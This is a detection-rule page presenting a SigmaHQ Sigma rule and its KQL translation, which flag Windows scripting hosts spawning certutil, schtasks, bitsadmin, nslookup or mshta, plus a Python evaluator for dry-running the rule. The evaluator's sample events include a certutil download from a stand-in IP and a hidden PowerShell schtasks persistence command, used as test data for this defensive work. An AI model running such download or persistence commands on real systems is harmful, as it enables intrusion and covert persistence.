
Windows Shell/Scripting Processes Spawning Suspicious Programs

Format: Sigma · Severity: HIGH · Source: SigmaHQ
ATT&CK: T1059.005, T1059.001, T1218
Sentinel table: imProcessCreate · Tag: powershell
This rule was pulled from an open-source repository and enriched with AI. Validate in a test environment before deploying to production.
View original rule at SigmaHQ →
Retrieved: 2026-05-22T11:00:00Z · Confidence: medium

Hunt Hypothesis

Windows shell and scripting hosts (wscript, cscript, powershell, pwsh, mshta, rundll32, regsvr32, wmiprvse) rarely need to spawn schtasks, nslookup, certutil, bitsadmin or mshta in normal use, but those children are the staple of download cradles and persistence one-liners. This rule alerts on that parent/child pairing, then carves out the known benign sources (SCCM client cache and installer, Amazon WorkSpaces scripts, Nessus). cmd.exe is deliberately not in the parent list because it produces too many false positives.

Detection Rule

Sigma (Original)

title: Windows Shell/Scripting Processes Spawning Suspicious Programs
id: 3a6586ad-127a-4d3b-a677-1e6eacdf8fde
status: test
description: Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.
references:
    - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
author: Florian Roth (Nextron Systems), Tim Shelton
date: 2018-04-06
modified: 2023-05-23
tags:
    - attack.execution
    - attack.stealth
    - attack.t1059.005
    - attack.t1059.001
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\mshta.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            # - '\cmd.exe'  # too many false positives
            - '\rundll32.exe'
            - '\cscript.exe'
            - '\wscript.exe'
            - '\wmiprvse.exe'
            - '\regsvr32.exe'
        Image|endswith:
            - '\schtasks.exe'
            - '\nslookup.exe'
            - '\certutil.exe'
            - '\bitsadmin.exe'
            - '\mshta.exe'
    filter_ccmcache:
        CurrentDirectory|contains: '\ccmcache\'
    filter_amazon:
        ParentCommandLine|contains:
            # FP - Amazon Workspaces
            - '\Program Files\Amazon\WorkSpacesConfig\Scripts\setup-scheduledtask.ps1'
            - '\Program Files\Amazon\WorkSpacesConfig\Scripts\set-selfhealing.ps1'
            - '\Program Files\Amazon\WorkSpacesConfig\Scripts\check-workspacehealth.ps1'
            - '\nessus_' # Tenable/Nessus VA Scanner
    filter_nessus:
        CommandLine|contains: '\nessus_' # Tenable/Nessus VA Scanner
    filter_sccm_install:
        ParentImage|endswith: '\mshta.exe'
        Image|endswith: '\mshta.exe'
        ParentCommandLine|contains|all:
            - 'C:\MEM_Configmgr_'
            - '\splash.hta'
            - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}'
        CommandLine|contains|all:
            - 'C:\MEM_Configmgr_'
            - '\SMSSETUP\BIN\'
            - '\autorun.hta'
            - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}'
    condition: selection and not 1 of filter_*
falsepositives:
    - Administrative scripts
    - Microsoft SCCM
level: high

KQL (Azure Sentinel)

imProcessCreate
| where (
    (
        (ParentProcessName endswith "\\mshta.exe" or ParentProcessName endswith "\\powershell.exe" or ParentProcessName endswith "\\pwsh.exe" or ParentProcessName endswith "\\rundll32.exe" or ParentProcessName endswith "\\cscript.exe" or ParentProcessName endswith "\\wscript.exe" or ParentProcessName endswith "\\wmiprvse.exe" or ParentProcessName endswith "\\regsvr32.exe")
        or (ActingProcessName endswith "\\mshta.exe" or ActingProcessName endswith "\\powershell.exe" or ActingProcessName endswith "\\pwsh.exe" or ActingProcessName endswith "\\rundll32.exe" or ActingProcessName endswith "\\cscript.exe" or ActingProcessName endswith "\\wscript.exe" or ActingProcessName endswith "\\wmiprvse.exe" or ActingProcessName endswith "\\regsvr32.exe")
    )
    and (TargetProcessName endswith "\\schtasks.exe" or TargetProcessName endswith "\\nslookup.exe" or TargetProcessName endswith "\\certutil.exe" or TargetProcessName endswith "\\bitsadmin.exe" or TargetProcessName endswith "\\mshta.exe")
  )
  and (not(
    (
        TargetProcessCurrentDirectory contains "\\ccmcache\\"
        or (ActingProcessCommandLine contains "\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\setup-scheduledtask.ps1" or ActingProcessCommandLine contains "\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\set-selfhealing.ps1" or ActingProcessCommandLine contains "\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\check-workspacehealth.ps1" or ActingProcessCommandLine contains "\\nessus_")
        or TargetProcessCommandLine contains "\\nessus_"
        or (
            (ParentProcessName endswith "\\mshta.exe" or ActingProcessName endswith "\\mshta.exe")
            and TargetProcessName endswith "\\mshta.exe"
            and (ActingProcessCommandLine contains "C:\\MEM_Configmgr_" and ActingProcessCommandLine contains "\\splash.hta" and ActingProcessCommandLine contains "{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}")
            and (TargetProcessCommandLine contains "C:\\MEM_Configmgr_" and TargetProcessCommandLine contains "\\SMSSETUP\\BIN\\" and TargetProcessCommandLine contains "\\autorun.hta" and TargetProcessCommandLine contains "{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}")
        )
    )
  ))
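To dry-run the selection, the four filters and the condition "selection and not 1 of filter_*" before deploying the rule, here is an added Python evaluator. It is not SigmaHQ code and not part of the original page; it reimplements the rule's matching logic over constructed Sysmon-style events. Field names follow the Sigma process_creation taxonomy (Image, ParentImage, CommandLine, ParentCommandLine, CurrentDirectory); the user paths, the IP 203.0.113.5 and the MEM_Configmgr_2303 version suffix in the sample events are assumptions made up for the example.

```python
# Added example, not SigmaHQ code: evaluates the Sigma selection, filters and
# condition above against constructed Sysmon-style events. Field names follow the
# Sigma process_creation taxonomy; the paths, IP and version suffix below are made up.
SUSPICIOUS_PARENTS = ("\\mshta.exe", "\\powershell.exe", "\\pwsh.exe", "\\rundll32.exe",
                      "\\cscript.exe", "\\wscript.exe", "\\wmiprvse.exe", "\\regsvr32.exe")
SUSPICIOUS_CHILDREN = ("\\schtasks.exe", "\\nslookup.exe", "\\certutil.exe",
                       "\\bitsadmin.exe", "\\mshta.exe")
AMAZON_PARENT_CMDLINES = (
    "\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\setup-scheduledtask.ps1",
    "\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\set-selfhealing.ps1",
    "\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\check-workspacehealth.ps1",
    "\\nessus_",  # Tenable/Nessus, listed under filter_amazon in the rule
)
SCCM_GUID = "{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}"

def _field(event, name):
    # Sigma string modifiers match case-insensitively, so normalise once here.
    return str(event.get(name, "")).lower()

def _endswith_any(value, suffixes):
    return any(value.endswith(s.lower()) for s in suffixes)

def _contains_all(value, needles):  # Sigma |contains|all
    return all(n.lower() in value for n in needles)

def selection(event):
    return (_endswith_any(_field(event, "ParentImage"), SUSPICIOUS_PARENTS)
            and _endswith_any(_field(event, "Image"), SUSPICIOUS_CHILDREN))

def filter_ccmcache(event):
    return "\\ccmcache\\" in _field(event, "CurrentDirectory")

def filter_amazon(event):
    parent_cmd = _field(event, "ParentCommandLine")
    return any(s.lower() in parent_cmd for s in AMAZON_PARENT_CMDLINES)

def filter_nessus(event):
    return "\\nessus_" in _field(event, "CommandLine")

def filter_sccm_install(event):
    return (_field(event, "ParentImage").endswith("\\mshta.exe")
            and _field(event, "Image").endswith("\\mshta.exe")
            and _contains_all(_field(event, "ParentCommandLine"),
                              ("C:\\MEM_Configmgr_", "\\splash.hta", SCCM_GUID))
            and _contains_all(_field(event, "CommandLine"),
                              ("C:\\MEM_Configmgr_", "\\SMSSETUP\\BIN\\", "\\autorun.hta", SCCM_GUID)))

FILTERS = (filter_ccmcache, filter_amazon, filter_nessus, filter_sccm_install)

def matches(event):
    """condition: selection and not 1 of filter_*"""
    return selection(event) and not any(f(event) for f in FILTERS)

# Constructed sample events (not real telemetry).
SYS32 = "C:\\Windows\\System32\\"
PS = SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {   # 0: VBS download cradle fetching a payload with certutil -> alert
        "ParentImage": SYS32 + "wscript.exe",
        "ParentCommandLine": "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\invoice.vbs",
        "Image": SYS32 + "certutil.exe",
        "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.5/a.dat C:\\Users\\u\\a.dat",
        "CurrentDirectory": "C:\\Users\\u\\"},
    {   # 1: hidden PowerShell script persisting via schtasks -> alert
        "ParentImage": PS,
        "ParentCommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -File C:\\Users\\u\\AppData\\Roaming\\upd.ps1",
        "Image": SYS32 + "schtasks.exe",
        "CommandLine": "schtasks.exe /Create /SC ONLOGON /TN Updater /TR C:\\Users\\u\\AppData\\Roaming\\upd.ps1",
        "CurrentDirectory": "C:\\Users\\u\\"},
    {   # 2: same parent/child pair, but run from the SCCM client cache -> filter_ccmcache
        "ParentImage": PS,
        "ParentCommandLine": "powershell.exe -ExecutionPolicy Bypass -File .\\install.ps1",
        "Image": SYS32 + "schtasks.exe",
        "CommandLine": "schtasks.exe /Create /SC DAILY /TN Inventory /TR C:\\Windows\\ccmcache\\1a\\inv.exe",
        "CurrentDirectory": "C:\\Windows\\ccmcache\\1a\\"},
    {   # 3: SCCM installer splash.hta launching autorun.hta -> filter_sccm_install
        "ParentImage": SYS32 + "mshta.exe",
        "ParentCommandLine": "mshta.exe C:\\MEM_Configmgr_2303\\splash.hta " + SCCM_GUID,
        "Image": SYS32 + "mshta.exe",
        "CommandLine": "mshta.exe C:\\MEM_Configmgr_2303\\SMSSETUP\\BIN\\I386\\autorun.hta " + SCCM_GUID,
        "CurrentDirectory": "C:\\MEM_Configmgr_2303\\"},
    {   # 4: cmd.exe is deliberately absent from the parent list -> no selection
        "ParentImage": SYS32 + "cmd.exe",
        "ParentCommandLine": "cmd.exe /c nslookup example.com",
        "Image": SYS32 + "nslookup.exe",
        "CommandLine": "nslookup example.com",
        "CurrentDirectory": "C:\\Users\\u\\"},
]

def evaluate(events=SAMPLE_EVENTS):
    """Return the indexes of the events that fire the rule."""
    return [i for i, e in enumerate(events) if matches(e)]

if __name__ == "__main__":
    for i in evaluate():
        print(f"ALERT event[{i}]: {SAMPLE_EVENTS[i]['CommandLine']}")
```

Running the script alerts on events 0 and 1 only. Events 2 and 3 satisfy the selection but are suppressed by filter_ccmcache and filter_sccm_install, which is the behaviour to confirm when you tune the rule: a new exclusion should be checked against both a benign event it is meant to drop and a malicious event it must not drop. Event 4 shows why cmd.exe was left out of the parent list rather than handled by a filter.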

Required Data Sources

Sentinel Table      Notes
imProcessCreate     Ensure this data connector is enabled

False Positive Guidance

The rule lists administrative scripts and Microsoft SCCM as expected false positives, and its filters show what that means in practice: child processes started from the SCCM client cache (\ccmcache\), the SCCM installer's splash.hta to autorun.hta chain, the Amazon WorkSpaces configuration scripts, and Tenable/Nessus scanner activity are excluded. cmd.exe is intentionally missing from the parent list because of its volume. When adding exclusions of your own, follow the same pattern: key them on the parent command line, the current directory, or a full path, rather than removing a child process such as certutil or schtasks from the selection.

MITRE ATT&CK Context

T1059.001 (Command and Scripting Interpreter: PowerShell) and T1059.005 (Command and Scripting Interpreter: Visual Basic) describe the powershell.exe/pwsh.exe and wscript.exe/cscript.exe parents under the Execution tactic. T1218 (System Binary Proxy Execution) describes mshta.exe, rundll32.exe and regsvr32.exe as signed, Microsoft-shipped binaries used to launch the child process while evading controls, under Defense Evasion.

References

Original source: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml